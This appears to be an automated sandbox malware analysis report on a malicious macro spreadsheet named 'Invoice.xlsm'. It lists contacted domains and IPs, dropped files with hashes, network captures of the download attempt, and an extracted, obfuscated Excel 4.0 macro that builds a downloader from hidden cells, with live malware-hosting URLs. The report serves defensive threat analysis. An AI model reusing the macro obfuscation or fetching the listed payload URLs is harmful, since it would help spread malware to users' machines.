          http://windowsmedia.com/redir/services.asp?WMPFriendly=trueEXCEL.EXE, 00000000.00000002.1225027533.0000000005257000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.963514761.0000000000B37000.00000002.00020000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://www.hotmail.com/oerundll32.exe, 00000004.00000002.963320714.0000000000950000.00000002.00020000.sdmpfalse
            high
            http://schemas.openEXCEL.EXE, 00000000.00000002.1225495153.00000000058A6000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            unknown
            https://ascarya.digital/wp-content%https://ascarya.digital/wp-content/ZH&https://ascarya.digital/wp-EXCEL.EXE, 00000000.00000002.1225438699.000000000584A000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&CheckEXCEL.EXE, 00000000.00000002.1225027533.0000000005257000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.963514761.0000000000B37000.00000002.00020000.sdmpfalse
              high
              http://www.icra.org/vocabulary/.EXCEL.EXE, 00000000.00000002.1225027533.0000000005257000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.963514761.0000000000B37000.00000002.00020000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://schemas.openformatrg/package/2006/rEXCEL.EXE, 00000000.00000002.1225495153.00000000058A6000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              unknown
              https://ascarya.digital/wEXCEL.EXE, 00000000.00000002.1225438699.000000000584A000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://investor.msn.com/rundll32.exe, 00000004.00000002.963320714.0000000000950000.00000002.00020000.sdmpfalse
                high
                https://ascarya.digitalEXCEL.EXE, 00000000.00000002.1225438699.000000000584A000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://ascarya.digital/EXCEL.EXE, 00000000.00000002.1225583101.0000000005A7F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.1023508307.0000000005A7F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.1021291549.0000000005A7F000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://ascarya.digEXCEL.EXE, 00000000.00000002.1225438699.000000000584A000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://ascarya.digital/wp-content/ZH4rirU/EXCEL.EXE, 00000000.00000002.1225438699.000000000584A000.00000004.00000001.sdmptrue
                • Avira URL Cloud: malware
                unknown
                https://ascarya.digital/wp-cEXCEL.EXE, 00000000.00000002.1225438699.000000000584A000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                94.102.59.39
                crackedshop.orgNetherlands
                202425INT-NETWORKSCfalse
                67.207.81.73
                ascarya.digitalUnited States
                14061DIGITALOCEAN-ASNUSfalse

                General Information

                Joe Sandbox Version:34.0.0 Boulder Opal
                Analysis ID:532378
                Start date:02.12.2021
                Start time:07:00:37
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 9m 21s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:Invoice.xlsm
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:7
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal76.expl.winXLSM@3/6@2/2
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 5
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .xlsm
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Found warning dialog
                • Click Ok
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, WMIADAP.exe, svchost.exe
                • Execution Graph export aborted for target EXCEL.EXE, PID 2208 because there are no executed function

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                DIGITALOCEAN-ASNUS56449657.xlsmGet hashmaliciousBrowse
                • 157.230.250.107
                3762.xlsmGet hashmaliciousBrowse
                • 157.230.250.107
                56449657.xlsmGet hashmaliciousBrowse
                • 157.230.250.107
                08676789691.xlsmGet hashmaliciousBrowse
                • 157.230.250.107
                3762.xlsmGet hashmaliciousBrowse
                • 157.230.250.107
                55339.xlsmGet hashmaliciousBrowse
                • 157.230.250.107
                08676789691.xlsmGet hashmaliciousBrowse
                • 157.230.250.107
                55339.xlsmGet hashmaliciousBrowse
                • 157.230.250.107
                SecuriteInfo.com.Heur.8342.xlsGet hashmaliciousBrowse
                • 157.230.250.107
                SecuriteInfo.com.Heur.17052.xlsGet hashmaliciousBrowse
                • 157.230.250.107
                SecuriteInfo.com.Heur.8342.xlsGet hashmaliciousBrowse
                • 157.230.250.107
                57949616735.xlsmGet hashmaliciousBrowse
                • 157.230.250.107
                57949616735.xlsmGet hashmaliciousBrowse
                • 157.230.250.107
                44307.xlsmGet hashmaliciousBrowse
                • 157.230.250.107
                44307.xlsmGet hashmaliciousBrowse
                • 157.230.250.107
                77859564213.xlsmGet hashmaliciousBrowse
                • 157.230.250.107
                77859564213.xlsmGet hashmaliciousBrowse
                • 157.230.250.107
                1762311.xlsmGet hashmaliciousBrowse
                • 157.230.250.107
                1762311.xlsmGet hashmaliciousBrowse
                • 157.230.250.107
                88985.xlsmGet hashmaliciousBrowse
                • 157.230.250.107
                INT-NETWORKSCyakuza.x86Get hashmaliciousBrowse
                • 94.102.52.200
                yakuza.arm7Get hashmaliciousBrowse
                • 94.102.52.207
                JWCIQ6dmiXGet hashmaliciousBrowse
                • 196.16.9.109
                g3XlmknqG3Get hashmaliciousBrowse
                • 196.16.37.18
                re2.x86Get hashmaliciousBrowse
                • 196.16.25.46
                jew.arm7Get hashmaliciousBrowse
                • 94.102.52.203
                ef5rWphlBV.exeGet hashmaliciousBrowse
                • 89.248.173.187
                6czjyyvzVM.exeGet hashmaliciousBrowse
                • 145.249.106.195
                7NDorjJtM6.exeGet hashmaliciousBrowse
                • 145.249.106.195
                7NDorjJtM6.exeGet hashmaliciousBrowse
                • 145.249.106.195
                Reciept_20438048.xlsbGet hashmaliciousBrowse
                • 145.249.106.39
                Reciept_20438048.xlsbGet hashmaliciousBrowse
                • 145.249.106.39
                Reciept_20438048.xlsbGet hashmaliciousBrowse
                • 145.249.106.39
                7spunOMzSKGet hashmaliciousBrowse
                • 196.16.25.39
                VtlQkDgDjEGet hashmaliciousBrowse
                • 196.16.9.117
                Reciept 5528051.xlsbGet hashmaliciousBrowse
                • 145.249.106.39
                Reciept 5528051.xlsbGet hashmaliciousBrowse
                • 145.249.106.39
                Reciept 8767556.xlsbGet hashmaliciousBrowse
                • 145.249.106.39
                9TW5TjqwON.dllGet hashmaliciousBrowse
                • 80.82.67.127
                Cib5IX5kD5.dllGet hashmaliciousBrowse
                • 80.82.67.127

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\suspendedpage[1].htm
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:HTML document, ASCII text, with very long lines
                Category:downloaded
                Size (bytes):7624
                Entropy (8bit):5.6428645067252985
                Encrypted:false
                SSDEEP:192:olVZHCkA26xd3Q4JRveuTtMy47R/Ga0kVhFuPwf8Pn9wHHyJZS:QJvVGaRF8I8Q
                MD5:EB2F7C463E3BEFAD0174E89C10451BCD
                SHA1:80C6604E30655B9BA949210122CCFAF9C7D67766
                SHA-256:5E6DEB3C5AD4E6AB599A3B1A86FCAF25F721C32ED65E83128E9EC0F7ACB1CA0E
                SHA-512:108CF3C4FEE5CC37A16B8A1EF302F66ED6FBE0E5638127689E2F904837688813D8EE424A53A1AABE18034E54B2695852F6DF8B62E792D74B1CD343ECA3A134C1
                Malicious:false
                Reputation:low
                IE Cache URL:http://crackedshop.org/cgi-sys/suspendedpage.cgi
                Preview: <!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5EEDDA76.png
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PNG image data, 1714 x 241, 8-bit colormap, non-interlaced
                Category:dropped
                Size (bytes):14200
                Entropy (8bit):7.855440184003825
                Encrypted:false
                SSDEEP:384:aeN0UV6iAmjeSvWFL3SdwHEpS4Q24kc49+Tb:jmUxjfC30+kS4Qyob
                MD5:4FE798EE522800691796BC9446918C90
                SHA1:1E01CDE49D0B1B5E2F0DFBAD568DC2ECFBEDEAD3
                SHA-256:EC0BC049D3D30C29567806EB2D555589CD2E1B6B30E9145F77B73A32EC1C1087
                SHA-512:FF968DA2D921DA198E93E82E2FB15583CFA4696455755A6674BC321CD90AE5502ADDC445A0F8C630D9DC780E77EEC6FFC83F55CD2C16DDE7F465BFD0D89BF1AA
                Malicious:false
                Reputation:low
                Preview: .PNG........IHDR..............-......sRGB.........gAMA......a.....PLTE....6...6.....6..a..a..6......a.....a...aa....6....6...66666.6aa..a..6aaa...a....66.....aaaa..aaaa6a....a....66...6.a.....S.b.....6.:...b....f....S.....t:...6t...f..........:6...S:6.:bS......fbS..Sf.t.....:.t..t....bS..tfb..6.f...Sfb.......:.S.....6l...WtRNS........................................................................................c5.....pHYs..........o.d..5.IDATx^.....q....R.A...[.l...'@. .....G..'..;...%..]U]3s....x.s.;.]]..W...............................................................................................................................................~..|....../~...?.{...~fe./...).H....Og1.6g....1T+v..'"h.._(Z;.Zh.bo.....rip..5.>..).h..(F....Z.[.q2B.WZz,...M}@..n$.dO.VK?......YZ...."-o#.K..q..-#5.JT1.K.H..]se.M+.!...R..m{..Q#lO..^ev.R:...0.>.....\....=.>.Op.<..p....qN.Vfq,..\F..6.1..+.. .J....c.4?.Jx...u..X+.E.D...Ko.}...s..G..8I.v...8'B....y..).
                C:\Users\user\AppData\Local\Temp\3F61.tmp
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Composite Document File V2 Document, Cannot read section info
                Category:dropped
                Size (bytes):1536
                Entropy (8bit):1.1464700112623651
                Encrypted:false
                SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Temp\~DFF5ECB97273E842F1.TMP
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):512
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3::
                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                Malicious:false
                Reputation:high, very likely benign file
                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\Desktop\~$Invoice.xlsm
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):165
                Entropy (8bit):1.4377382811115937
                Encrypted:false
                SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                MD5:797869BB881CFBCDAC2064F92B26E46F
                SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                Malicious:true
                Reputation:high, very likely benign file
                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                C:\Users\user\besta.ocx
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:HTML document, ASCII text, with very long lines
                Category:dropped
                Size (bytes):7624
                Entropy (8bit):5.6428645067252985
                Encrypted:false
                SSDEEP:192:olVZHCkA26xd3Q4JRveuTtMy47R/Ga0kVhFuPwf8Pn9wHHyJZS:QJvVGaRF8I8Q
                MD5:EB2F7C463E3BEFAD0174E89C10451BCD
                SHA1:80C6604E30655B9BA949210122CCFAF9C7D67766
                SHA-256:5E6DEB3C5AD4E6AB599A3B1A86FCAF25F721C32ED65E83128E9EC0F7ACB1CA0E
                SHA-512:108CF3C4FEE5CC37A16B8A1EF302F66ED6FBE0E5638127689E2F904837688813D8EE424A53A1AABE18034E54B2695852F6DF8B62E792D74B1CD343ECA3A134C1
                Malicious:false
                Reputation:low
                Preview: <!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.

                Static File Info

                General

                File type:Microsoft Excel 2007+
                Entropy (8bit):7.626730610857962
                TrID:
                • Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52%
                • Excel Microsoft Office Open XML Format document (40004/1) 40.40%
                • ZIP compressed archive (8000/1) 8.08%
                File name:Invoice.xlsm
                File size:38156
                MD5:41b25400c2b31b922dd090e1251b37b8
                SHA1:b543cbb86a4e50506fb9be2ac455e4e606948d65
                SHA256:734577b2ffb53ddf37d71db650178c94c017f8749a9f9497d2f76abd876418a6
                SHA512:54e9149a93dc7ab334251be6d193c4c08f0b6fd93f717e54873c99eab60d1627f55191e2b4ba5b3e1514eecd0875bf5ce0446cd0730160dcf57743e0e02ae458
                SSDEEP:768:oi/I83SgrjevZCwVIpvxmUxjfC30+kS4QyoO0VIMo+zl:oinZIIpvxXYk4pTVIQ
                File Content Preview:PK..........!.L#li............[Content_Types].xml ...(.........................................................................................................................................................................................................

                File Icon

                Icon Hash:e4e2aa8aa4bcbcac

                Static OLE Info

                General

                Document Type:OpenXML
                Number of OLE Files:1

                OLE File "Invoice.xlsm"

                Indicators

                Has Summary Info:
                Application Name:
                Encrypted Document:
                Contains Word Document Stream:
                Contains Workbook/Book Stream:
                Contains PowerPoint Document Stream:
                Contains Visio Document Stream:
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:

                Macro 4.0 Code

                4,7,=CHAR('Ss1'!E45)
                11,1,o
                
                1,5,L
                11,1,=CHAR('Ss1'!N43)
                
                2,0,r
                10,4,=CHAR('Ss1'!D39)
                
                1,8,C
                12,3,=CHAR('Ss1'!S46)
                
                1,3,=FORMULA()=FORMULA()=FORMULA('Buk1'!E11,'Buk2'!B12)=FORMULA('Buk2'!H5,'Buk3'!H3)=FORMULA('Buk3'!C9,'Buk4'!C2)=FORMULA('Buk4'!I8,'Buk5'!F2)=FORMULA('Buk5'!B12,'Buk6'!B10)=FORMULA('Buk6'!G3,'Buk7'!I2)=FORMULA('Buk7'!D13,'Buk1'!A3)=FORMULA('Buk3'!H3&'Ss1'!O6&'Ss1'!D16&'Ss1'!K13&'Ss1'!R12&'Ss1'!R14,D3)=FORMULA('Buk3'!H3&'Buk7'!I2&'Buk4'!C2&'Buk5'!F2&'Buk5'!F2&Ss1br2!B3&'Buk1'!A3&Ss1br2!D5&'Buk6'!B10&Ss1br2!G3&'Buk7'!I2&'Buk7'!I2&Ss1br2!B9,D17)=FORMULA('Buk3'!H3&'Ss1'!H21&'Ss1'!G23&'Ss1'!R12&"SASA"&'Ss1'!R9&'Ss1'!I8&'Ss1'!R7&'Ss1'!R11&'Buk7'!I2&'Buk4'!C2&'Buk5'!F2&'Buk5'!F2&Ss1br2!B3&'Buk1'!A3&Ss1br2!D5&'Buk6'!B10&Ss1br2!G3&'Buk7'!I2&'Buk7'!I2&Ss1br2!L5&'Ss1'!R14,D19)=FORMULA('Buk3'!H3&'Ss1'!H21&'Ss1'!G23&'Ss1'!R12&"SASA1"&'Ss1'!R9&'Ss1'!I8&'Ss1'!R7&'Ss1'!R11&'Buk7'!I2&'Buk4'!C2&'Buk5'!F2&'Buk5'!F2&Ss1br2!B3&'Buk1'!A3&Ss1br2!D5&'Buk6'!B10&Ss1br2!G3&'Buk7'!I2&'Buk7'!I2&Ss1br2!O9&'Ss1'!R14,D21)=FORMULA('Buk3'!H3&'Ss1'!H21&'Ss1'!G23&'Ss1'!R12&"SASA2"&'Ss1'!R9&'Ss1'!I8&'Ss1'!R7&'Ss1'!M20&'Ss1'!K23&'Ss1'!N24&'Ss1'!P18&'Ss1'!K18&'Ss1'!R12&'Ss1'!I8&'Ss1'!R14&'Ss1'!R7&'Ss1'!R14,D23)=FORMULA('Buk3'!H3&'Ss1'!J7&'Ss1'!N15&'Ss1'!J7&'Ss1'!M20&'Ss1'!R12&'Ss1'!R16&Ss1br2!Q3&Ss1br2!K10&Ss1br2!I1&'Ss1'!R11&'Ss1'!R5&'Ss1'!R5&'Ss1'!R3&'Ss1'!P2&'Ss1'!O1&'Ss1'!O9&'Ss1'!N5&'Ss1'!F3&'Ss1'!R5&'Ss1'!B9&'Ss1'!I12&'Ss1'!K8&'Ss1'!R7&'Ss1'!R16&'Ss1'!R18&"LKLW"&'Ss1'!R14,D25)=FORMULA('Buk3'!H3&'Ss1'!K54&'Ss1'!K56&'Ss1'!J58&'Ss1'!M52&'Ss1'!K54&'Ss1'!M61&'Ss1'!R12&'Ss1'!R14,D32)
                
                2,7,=
                8,2,=CHAR('Ss1'!G40)
                
                1,2,A
                7,8,=CHAR('Ss1'!J39)
                
                2,6,=CHAR('Ss1'!R41)
                9,1,e
                

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Dec 2, 2021 07:01:24.351258993 CET49165443192.168.2.2267.207.81.73
                Dec 2, 2021 07:01:24.351285934 CET4434916567.207.81.73192.168.2.22
                Dec 2, 2021 07:01:24.351373911 CET49165443192.168.2.2267.207.81.73
                Dec 2, 2021 07:01:24.367469072 CET49165443192.168.2.2267.207.81.73
                Dec 2, 2021 07:01:24.367495060 CET4434916567.207.81.73192.168.2.22
                Dec 2, 2021 07:03:33.889127016 CET4434916567.207.81.73192.168.2.22
                Dec 2, 2021 07:03:33.891994953 CET49167443192.168.2.2267.207.81.73
                Dec 2, 2021 07:03:33.892029047 CET4434916767.207.81.73192.168.2.22
                Dec 2, 2021 07:03:33.892098904 CET49167443192.168.2.2267.207.81.73
                Dec 2, 2021 07:03:33.892942905 CET49167443192.168.2.2267.207.81.73
                Dec 2, 2021 07:03:33.892955065 CET4434916767.207.81.73192.168.2.22
                Dec 2, 2021 07:05:44.961347103 CET4434916767.207.81.73192.168.2.22
                Dec 2, 2021 07:05:44.965707064 CET49169443192.168.2.2267.207.81.73
                Dec 2, 2021 07:05:44.965763092 CET4434916967.207.81.73192.168.2.22
                Dec 2, 2021 07:05:44.965945959 CET49169443192.168.2.2267.207.81.73
                Dec 2, 2021 07:05:44.966692924 CET49169443192.168.2.2267.207.81.73
                Dec 2, 2021 07:05:44.966768026 CET4434916967.207.81.73192.168.2.22
                Dec 2, 2021 07:05:44.966856956 CET49169443192.168.2.2267.207.81.73
                Dec 2, 2021 07:05:45.026799917 CET4917080192.168.2.2294.102.59.39
                Dec 2, 2021 07:05:45.052753925 CET804917094.102.59.39192.168.2.22
                Dec 2, 2021 07:05:45.052925110 CET4917080192.168.2.2294.102.59.39
                Dec 2, 2021 07:05:45.054043055 CET4917080192.168.2.2294.102.59.39
                Dec 2, 2021 07:05:45.079936981 CET804917094.102.59.39192.168.2.22
                Dec 2, 2021 07:05:45.080452919 CET804917094.102.59.39192.168.2.22
                Dec 2, 2021 07:05:45.080544949 CET4917080192.168.2.2294.102.59.39
                Dec 2, 2021 07:05:45.083730936 CET4917080192.168.2.2294.102.59.39
                Dec 2, 2021 07:05:45.128349066 CET804917094.102.59.39192.168.2.22
                Dec 2, 2021 07:05:45.128511906 CET4917080192.168.2.2294.102.59.39
                Dec 2, 2021 07:05:45.140207052 CET804917094.102.59.39192.168.2.22
                Dec 2, 2021 07:05:45.140254974 CET804917094.102.59.39192.168.2.22
                Dec 2, 2021 07:05:45.140295982 CET804917094.102.59.39192.168.2.22
                Dec 2, 2021 07:05:45.140335083 CET804917094.102.59.39192.168.2.22
                Dec 2, 2021 07:05:45.140336037 CET4917080192.168.2.2294.102.59.39
                Dec 2, 2021 07:05:45.140374899 CET804917094.102.59.39192.168.2.22
                Dec 2, 2021 07:05:45.140413046 CET804917094.102.59.39192.168.2.22
                Dec 2, 2021 07:05:45.140413046 CET4917080192.168.2.2294.102.59.39
                Dec 2, 2021 07:05:45.140445948 CET4917080192.168.2.2294.102.59.39
                Dec 2, 2021 07:05:45.140451908 CET4917080192.168.2.2294.102.59.39
                Dec 2, 2021 07:05:45.140455961 CET4917080192.168.2.2294.102.59.39
                Dec 2, 2021 07:05:45.140484095 CET4917080192.168.2.2294.102.59.39
                Dec 2, 2021 07:05:45.140993118 CET804917094.102.59.39192.168.2.22
                Dec 2, 2021 07:05:45.141083002 CET4917080192.168.2.2294.102.59.39
                Dec 2, 2021 07:05:50.147262096 CET804917094.102.59.39192.168.2.22
                Dec 2, 2021 07:05:50.147459030 CET4917080192.168.2.2294.102.59.39
                Dec 2, 2021 07:07:04.176698923 CET4917080192.168.2.2294.102.59.39
                Dec 2, 2021 07:07:04.487981081 CET4917080192.168.2.2294.102.59.39
                Dec 2, 2021 07:07:05.096318007 CET4917080192.168.2.2294.102.59.39
                Dec 2, 2021 07:07:06.313462019 CET4917080192.168.2.2294.102.59.39
                Dec 2, 2021 07:07:08.715873957 CET4917080192.168.2.2294.102.59.39
                Dec 2, 2021 07:07:13.521224022 CET4917080192.168.2.2294.102.59.39
                Dec 2, 2021 07:07:23.131480932 CET4917080192.168.2.2294.102.59.39

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Dec 2, 2021 07:01:24.320739985 CET5216753192.168.2.228.8.8.8
                Dec 2, 2021 07:01:24.341840029 CET53521678.8.8.8192.168.2.22
                Dec 2, 2021 07:05:45.000212908 CET5059153192.168.2.228.8.8.8
                Dec 2, 2021 07:05:45.022912025 CET53505918.8.8.8192.168.2.22

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Dec 2, 2021 07:01:24.320739985 CET192.168.2.228.8.8.80x6371Standard query (0)ascarya.digitalA (IP address)IN (0x0001)
                Dec 2, 2021 07:05:45.000212908 CET192.168.2.228.8.8.80xcf16Standard query (0)crackedshop.orgA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Dec 2, 2021 07:01:24.341840029 CET8.8.8.8192.168.2.220x6371No error (0)ascarya.digital67.207.81.73A (IP address)IN (0x0001)
                Dec 2, 2021 07:05:45.022912025 CET8.8.8.8192.168.2.220xcf16No error (0)crackedshop.org94.102.59.39A (IP address)IN (0x0001)

                HTTP Request Dependency Graph

                • crackedshop.org

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.224917094.102.59.3980C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampkBytes transferredDirectionData
                Dec 2, 2021 07:05:45.054043055 CET2OUTGET /9/q080U0ARYYL/ HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: crackedshop.org
                Connection: Keep-Alive
                Dec 2, 2021 07:05:45.080452919 CET2INHTTP/1.1 302 Found
                Date: Thu, 02 Dec 2021 06:05:45 GMT
                Server: Apache
                Location: http://crackedshop.org/cgi-sys/suspendedpage.cgi
                Content-Length: 232
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 72 61 63 6b 65 64 73 68 6f 70 2e 6f 72 67 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://crackedshop.org/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>
                Dec 2, 2021 07:05:45.083730936 CET3OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: crackedshop.org
                Connection: Keep-Alive
                Dec 2, 2021 07:05:45.128349066 CET3INHTTP/1.1 200 OK
                Date: Thu, 02 Dec 2021 06:05:45 GMT
                Server: Apache
                Keep-Alive: timeout=5, max=99
                Connection: Keep-Alive
                Transfer-Encoding: chunked
                Content-Type: text/html
                Dec 2, 2021 07:05:45.140207052 CET4INData Raw: 31 64 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e
                Data Ascii: 1dc8<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Ex
